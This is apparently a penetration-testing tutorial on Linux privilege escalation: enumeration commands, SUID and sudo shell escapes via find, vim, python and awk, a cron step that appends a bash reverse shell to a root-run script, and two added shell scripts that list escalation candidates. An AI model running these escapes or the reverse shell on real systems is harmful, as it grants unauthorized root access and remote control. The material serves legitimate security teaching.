Key Takeaways
- SUID binaries run with the file owner's privileges; look each one up on GTFOBins for a shell escape.
- Sudo misconfigs: Check sudo -l for escalation paths.
- Cron jobs: Writable scripts run as root = instant privesc.
- Always run LinPEAS for comprehensive enumeration.
Linux privilege escalation is a core skill for penetration testers. After gaining a foothold as a low-privileged user, these techniques help you become root.
Essential Enumeration
# System info
uname -a
cat /etc/os-release
hostname
# Current user privileges
id
whoami
sudo -l
# Other users
cat /etc/passwd
cat /etc/shadow # Normally readable only by root; if you can read it, crack the hashes offline
# Network
netstat -tulpn
ss -tulpn
SUID Binary Exploitation
# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null
# Look up each binary on GTFOBins. Keep the elevated effective UID: both bash and
# dash reset euid to the real uid at startup unless given -p, so always spawn sh -p.
# Example: SUID on find
find . -exec /bin/sh -p \; -quit
# Example: SUID on vim. A plain ':!/bin/sh' escape goes through the user's shell,
# which drops the SUID euid; the GTFOBins SUID entry uses vim's Python binding
# instead (needs a vim built with +python3; vim --version lists the feature)
vim -c ':py3 import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'
# Example: SUID on python
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
# Verify: id should report euid=0(root)
Sudo Exploitation
# Check sudo permissions (may prompt for the current user's password; NOPASSWD entries need none)
sudo -l
# sudo sets the real uid to root, so no -p is needed on the spawned shell
# Example: (ALL) NOPASSWD: /usr/bin/vim
sudo vim -c ':!/bin/sh'
# Example: (ALL) NOPASSWD: /usr/bin/find
# -quit stops after the first match; without it find spawns a new shell for every file it visits
sudo find . -exec /bin/sh \; -quit
# Example: (ALL) NOPASSWD: /usr/bin/awk
sudo awk 'BEGIN {system("/bin/sh")}'
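The SUID and sudo checks above can be scripted so that nothing is missed on a large host. The script below is an added example written for this page, not the page's own code and not a GTFOBins tool: it lists SUID files below a root directory, parses `sudo -l` output into the permitted commands, and flags any program whose name is in a short built-in list of binaries with well-known GTFOBins shell escapes. The list (GTFO_SHELLS) is an assumed subset, not the GTFOBins database, the `sudo -l` sample is constructed, and the script only reports candidates; you still exploit each one with the matching GTFOBins technique.

```sh
#!/bin/sh
# triage.sh: added example (not from the original page or from GTFOBins). Lists
# SUID binaries below a root and parses "sudo -l" output, flagging programs that
# have a well-known GTFOBins shell escape. GTFO_SHELLS is an assumed short subset
# of GTFOBins (the binaries named on this page plus a few common ones), not the
# full database; always confirm the technique on GTFOBins itself.

GTFO_SHELLS="find vim vi nano python python3 perl awk gawk less more env bash sh"

# Constructed "sudo -l" output for the demo; not captured from a real host.
SAMPLE_SUDO_L='Matching Defaults entries for alice on web01:
    env_reset, mail_badpass

User alice may run the following commands on web01:
    (ALL) NOPASSWD: /usr/bin/vim
    (root) /usr/bin/find
    (ALL : ALL) NOPASSWD: /usr/bin/awk, /usr/sbin/service apache2 restart'

# is_gtfobin NAME: succeed when NAME is in GTFO_SHELLS
is_gtfobin() {
    for _g in $GTFO_SHELLS; do
        [ "$1" = "$_g" ] && return 0
    done
    return 1
}

# find_suid ROOT: setuid regular files below ROOT (the same search used above)
find_suid() {
    find "$1" -perm -4000 -type f 2>/dev/null
}

# triage_suid ROOT: print "CANDIDATE <path>" for each SUID file that is a GTFOBin
triage_suid() {
    find_suid "$1" | while IFS= read -r _path; do
        if is_gtfobin "$(basename "$_path")"; then
            printf 'CANDIDATE %s\n' "$_path"
        fi
    done
}

# triage_sudo: read "sudo -l" output on stdin and print "<NOPASSWD|PASSWD> <path>"
# for every permitted command that is a GTFOBin, or "<tag> ALL" for a blanket rule
triage_sudo() {
    while IFS= read -r _line; do
        _trim=$(printf '%s\n' "$_line" | sed 's/^[[:space:]]*//')
        case "$_trim" in
            '('*) ;;            # permission lines start with a runas spec such as (ALL)
            *) continue ;;
        esac
        case "$_trim" in
            *NOPASSWD:*) _tag=NOPASSWD ;;
            *) _tag=PASSWD ;;
        esac
        # drop the runas spec and any TAG: words (NOPASSWD:, SETENV:, ...), leaving
        # the comma-separated command list
        _cmds=$(printf '%s\n' "$_trim" | sed -e 's/^([^)]*)[[:space:]]*//' -e 's/^\([A-Z]*:[[:space:]]*\)*//')
        printf '%s\n' "$_cmds" | tr ',' '\n' | while IFS= read -r _cmd; do
            _cmd=$(printf '%s\n' "$_cmd" | sed 's/^[[:space:]]*//')
            _bin=${_cmd%% *}                 # the program path is the first word
            [ -n "$_bin" ] || continue
            if [ "$_bin" = ALL ]; then
                printf '%s ALL\n' "$_tag"
            elif is_gtfobin "$(basename "$_bin")"; then
                printf '%s %s\n' "$_tag" "$_bin"
            fi
        done
    done
}

# Usage: sh triage.sh      -> parse the constructed sample above
#        sh triage.sh run  -> scan / for SUID files and parse the real sudo -l
case "${1-}" in
    run)
        triage_suid /
        sudo -n -l 2>/dev/null | triage_sudo ;;   # -n: never prompt for a password
    *)
        printf '%s\n' "$SAMPLE_SUDO_L" | triage_sudo ;;
esac
```

The `sudo -l` parser strips the runas specification and any tag words before the command list, so an entry such as `(ALL : ALL) NOPASSWD: /usr/bin/awk, /usr/sbin/service apache2 restart` yields one flagged command (`awk`) and one ignored one; a bare `ALL` is reported on its own because it permits any command.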
Cron Job Abuse
# View cron jobs (system crontabs carry a user field: m h dom mon dow user command)
cat /etc/crontab
ls -la /etc/cron.d/
ls -la /etc/cron.daily/
# root's personal crontab under /var/spool/cron/ is not readable by other users;
# pspy shows what cron actually executes
# Check for writable scripts. Check the containing directory too: a writable
# directory lets you replace the file even when the file itself is read-only
ls -la /path/to/cronscript.sh
# If writable, and the job's user field is root, append a reverse shell.
# >> keeps the original job working; start a listener on 10.10.10.10:4444 first
echo 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1' >> /path/to/cronscript.sh
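Checking every cron script by hand is error-prone, so the check above can be automated. The following is an added example written for this page, not the page's own code or any tool's: it parses system crontab files (the `/etc/crontab` and `/etc/cron.d` format with a user field, plus `@reboot`-style lines), skips comments and environment assignments, and reports jobs whose script is writable by the current user, or whose directory is writable so the script can be replaced or created. The crontab content used in the demo is constructed, and only the first word of each command is resolved.

```sh
#!/bin/sh
# cron_writable.sh: added example (not from the original page). Parses system
# crontab files (minute hour dom month dow user command, or @reboot user command)
# and reports jobs whose script, or the directory holding it, is writable by the
# current user. A writable directory counts because the file can be replaced or,
# if missing, created (a sticky directory such as /var/tmp only allows creation).
# Only the command's first token is checked; a wrapper like "cd / && run-parts ..."
# is listed by cron_commands but not resolved.

# Constructed sample in /etc/crontab format; not captured from a real host.
SAMPLE_CRONTAB='# m h dom mon dow user command
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/5 *   * * *   root    /opt/backup/backup.sh
@reboot         root    /var/tmp/cleanup.sh >/dev/null 2>&1
0 3     * * *   www-data /usr/bin/php /var/www/cron.php'

# cron_commands FILE: print "<user> <first word of command>" for every job line
cron_commands() {
    awk '
        /^[[:space:]]*(#|$)/                   { next }               # comment or blank
        /^[[:space:]]*[A-Za-z_][A-Za-z0-9_]*=/ { next }               # SHELL=, PATH=, MAILTO=
        /^[[:space:]]*@/                       { print $2, $3; next } # @reboot user cmd
        /^[[:space:]]*[0-9*]/                  { print $6, $7 }       # 5 time fields, user, cmd
    ' "$1"
}

# check_cron FILE: print "WRITABLE-FILE <user> <path>" when the script is writable
# and "WRITABLE-DIR <user> <path>" when only its directory is. Commands given by a
# relative name (resolved through the crontab PATH) are skipped.
check_cron() {
    cron_commands "$1" | while read -r _user _script; do
        case "$_script" in /*) ;; *) continue ;; esac
        if [ -w "$_script" ]; then
            printf 'WRITABLE-FILE %s %s\n' "$_user" "$_script"
        elif [ -w "$(dirname "$_script")" ]; then
            printf 'WRITABLE-DIR %s %s\n' "$_user" "$_script"
        fi
    done
}

# Usage: sh cron_writable.sh      -> list the jobs in the constructed sample
#        sh cron_writable.sh run  -> check the real system crontabs
case "${1-}" in
    run)
        for _f in /etc/crontab /etc/cron.d/*; do
            [ -f "$_f" ] && check_cron "$_f"
        done ;;
    *)
        _tmp=$(mktemp)
        printf '%s\n' "$SAMPLE_CRONTAB" > "$_tmp"
        cron_commands "$_tmp"
        rm -f "$_tmp" ;;
esac
```

Run with `run` on a real host to check `/etc/crontab` and `/etc/cron.d/*`; the `user` column in the output tells you which account the job runs as, so only hits with `root` are direct privilege escalation. Jobs whose script lives under `/var/tmp` or another world-writable directory show up as WRITABLE-DIR when the file is missing, which is exactly the case where you can create it.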
Essential Tools
- LinPEAS: Comprehensive privesc enumeration script
- LinEnum: Classic Linux enumeration
- pspy: Monitor processes without root
- GTFOBins: Unix binary exploitation database
Frequently Asked Questions
What's the fastest way to check for privesc?
Run sudo -l first; many machines have misconfigured sudo rules. Then check SUID binaries and run LinPEAS for comprehensive coverage.